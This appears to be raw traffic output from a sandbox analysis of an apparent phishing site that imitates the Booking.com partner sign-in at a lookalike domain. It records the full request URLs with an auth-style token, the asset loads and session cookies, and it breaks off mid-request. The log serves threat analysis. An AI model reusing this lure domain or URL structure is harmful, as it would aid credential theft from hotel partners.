                Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1Host: roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global trafficHTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global trafficHTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1Host: roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global trafficHTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/otSDKStub.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/OtAutoBlock.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/lazysizes.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1Host: partner.booking.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/45_1975cbc2f7eaad75f590.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/938_afde72b9aaa8302ff017.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/826_0d1737e180931a217647.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_399BM-E_9aHp94scPSljMDjXwz84BMBa3y-GIQG8XYY.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/evergage.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/otSDKStub.js/consent/5b5ab62b-24f1-40fe-8bb1-6de0b3a94fda/5b5ab62b-24f1-40fe-8bb1-6de0b3a94fda.json HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_399BM-E_9aHp94scPSljMDjXwz84BMBa3y-GIQG8XYY.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_alert.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_tip.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 